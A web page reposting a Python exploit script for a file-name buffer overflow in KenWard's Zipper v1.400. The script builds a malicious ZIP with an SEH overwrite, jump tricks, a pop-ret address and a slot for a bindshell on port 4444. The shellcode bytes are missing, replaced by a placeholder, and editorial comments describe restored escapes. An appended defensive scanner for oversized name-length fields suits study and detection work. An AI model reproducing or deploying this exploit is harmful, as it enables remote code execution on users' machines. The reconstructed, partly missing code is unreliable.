KenWard's Zipper v1.400 Buffer Overflow-Meth

Source: Internet
Author: User

#!/usr/bin/python
# KenWards Zipper v1.400 File Name Buffer Overflow
# Coded by sinn3r (x90.sinner{at}gmail{d0t}com)
# Tested on: Windows XP SP3 ENG
# Reference: http://www.exploit-db.com/exploits/11834
# Big thanks to mr_me, and corelanc0d3r.
# Greetz to all the friends at Corelan Security Team & Exploit-DB... coolest people ever!
##
# Description:
# This exploit takes advantage of the fact that two characters get mangled, as a result
# I was able to get a shell in a more straight forward way. Very interesting exercise.
# Mr_me and tecR0c figured out this trick, of course. But I was given the honor to share it.
# Script provided as is, without any warranty.
# Use for educational purposes only. Do not use this code to do anything illegal.

# Zip file format based on:
# http://en.wikipedia.org/wiki/ZIP_(file_format)

# Note: Python 2 script; the string literals below are raw bytes and adjacent
# literals are concatenated implicitly. The \x escapes were restored from the
# extracted copy of this page.

local_file_header = (
"\x50\x4B\x03\x04"          # Local file header signature
"\x00\x02"                  # Version needed to extract
"\x00\x08"                  # General purpose bit flag
"\x00\xDA"                  # Compression method
"\xA2\x48"                  # File last modification time
"\x3B\xF6"                  # File last modification date
"\x66\x18\x0D\x4E"          # CRC-32
"\xEF\x0F\x00\x00"          # Compressed size (payload size)
"\x14\x00\x00\x00"          # Uncompressed size
"\xe4\x4f"                  # File name length
"\x04\x00"                  # Extra field length
#"\x73\x65\x63\x72\x65\x74\x73"   # File name (n) ASCII "secrets"
#"\x42\x42\x42\x42"               # Extra field (m)
)

central_directory_file_header = (
"\x50\x4b\x01\x02"          # Central directory file header signature
"\x14\x00"                  # Version made by
"\x14\x00"                  # Version needed to extract
"\x00\x08"                  # General purpose bit flag
"\x00\xDA"                  # Compression method
"\xA2\x48"                  # File last modification time
"\x3B\xF6"                  # File last modification date
"\x66\x18\x0D\x4E"          # CRC-32
"\xE4\x0F\x00\x00"          # Compressed size (payload size)
"\x14\x00\x00\x00"          # Uncompressed size
"\xe4\x0f"                  # File name length (n)
"\x04\x00"                  # Extra field length (m)
"\x04\x00"                  # File comment length (k)
"\x00\x01"                  # Disk number where file starts
"\x00\x00"                  # Internal file attributes
"\x20\x00\x00\x00"          # External file attributes
"\x00\x00\x00\x00"          # Relative offset of local file header
#"\x73\x65\x63\x72\x65\x74\x73"   # File name (n) ASCII "secrets"
#"\x42\x42\x42\x42"               # Extra field (m)
#"\x43\x43\x43\x43"               # File comment (k)
)

end_of_central_directory_record = (
"\x50\x4B\x05\x06"          # End of central directory signature
"\x00\x00"                  # Number of this disk
"\x00\x00"                  # Disk where central directory starts
"\x01\x00"                  # Number of central directory records on this disk
"\x01\x00"                  # Total number of central directory records
"\x12\x10\x00\x00"          # Size of central directory (central directory header + payload)
"\x02\x10\x00\x00"          # Offset of start of central directory, relative to start of archive (lfh + payload)
"\x00\x00"                  # Zip file comment length (n)
)

# Align EAX for the base address of the alpha2 encoded bindshell
alignEAX = (
"\x05\x10\x7E\x10\x7E"      # add eax, 0x7E107E10
"\x05\x09\x75\x01\x7E"      # add eax, 0x7E017509
"\x05\x02\x03\x01\x04"      # add eax, 0x04010302
"\x72\x07" +                # JB: jump over the bytes we can't overwrite
"\x41" * 12                 # NOPs
)

# windows/shell_bind_tcp LPORT=4444 EXITFUNC=seh
# alpha2 eax --uppercase, 744 bytes
# The encoded shellcode bytes did not survive extraction of this page and are
# not reproduced here; the placeholder keeps the script parseable.
shellcode = (
""                          # [744-byte alpha2 uppercase shellcode not recoverable from this copy]
)

# 4064 + 4 bytes
# Pointer to next SEH record: 1022 bytes
# SE handler: 1026 bytes
payload = (
"\x41" * (1017 - len(alignEAX) - len(shellcode)) +  # Padding
alignEAX +                  # Align EAX for the bindshell
shellcode +                 # Bindshell lport 4444
"\x82\x85\x81\x98\x98"      # This will get mangled and become "\xE9\xE0\xFC\xFF\xFF"
"\x73\x97\x42\x42"          # JNB 0x97 = JNB 0xF9 = Same as EB 0xFB = Rewind 5 bytes
"\x7E\x27\x41\x00" +        # pop ret = 0x0041277E
"\x44" * 3034 +             # Padding
".bin"                      # Fake name
)

# Create the ZIP structure with our payload
zip = (
local_file_header +
payload +
central_directory_file_header +
payload +
end_of_central_directory_record
)
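The weakness the archive above relies on is an unchecked file-name length field in the ZIP local and central headers. The following scanner is an added example written for this page, not code from the exploit or from KenWard's Zipper: it walks both header types and flags any entry whose name-length field exceeds a sane bound or the bytes actually present. The 260-byte bound (Windows MAX_PATH) and both sample archives are constructed assumptions.

```python
import io
import struct
import zipfile

LFH_SIG = b"PK\x03\x04"   # local file header signature
CDH_SIG = b"PK\x01\x02"   # central directory file header signature
MAX_NAME = 260            # assumed sane upper bound on a member name (Windows MAX_PATH)


def find_oversized_names(data, max_name=MAX_NAME):
    """Scan a ZIP image for headers whose file-name length field is larger than
    max_name or than the bytes remaining after the header.  Signature scanning
    (rather than trusting each header's own lengths) means a forged length
    cannot steer the scanner past the next header.  Returns a list of
    (offset, header_kind, name_len) tuples; an empty list means nothing odd."""
    findings = []
    pos = 0
    while True:
        pos = data.find(b"PK", pos)
        if pos < 0:
            break
        sig = data[pos:pos + 4]
        if sig == LFH_SIG and pos + 30 <= len(data):
            name_len, _extra_len = struct.unpack_from("<HH", data, pos + 26)
            kind, hdr_len = "local", 30
        elif sig == CDH_SIG and pos + 46 <= len(data):
            name_len, _extra_len, _comment_len = struct.unpack_from("<HHH", data, pos + 28)
            kind, hdr_len = "central", 46
        else:
            pos += 2            # not a header we check (e.g. EOCD or stray "PK" bytes)
            continue
        available = len(data) - (pos + hdr_len)
        if name_len > max_name or name_len > available:
            findings.append((pos, kind, name_len))
        pos += hdr_len
    return findings


def benign_sample():
    # Constructed: a normal one-member archive built with the standard library.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("secrets.txt", b"hello")
    return buf.getvalue()


def constructed_sample():
    # Constructed: a lone local file header whose name-length field is 0x0FE4
    # (4068), the overflow-sized "file name" shape discussed above, followed by
    # 4068 filler bytes and a 4-byte extra field.  All other fields are zero.
    hdr = LFH_SIG + b"\x00" * 22 + struct.pack("<HH", 4068, 4)
    return hdr + b"A" * 4068 + b"B" * 4
```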
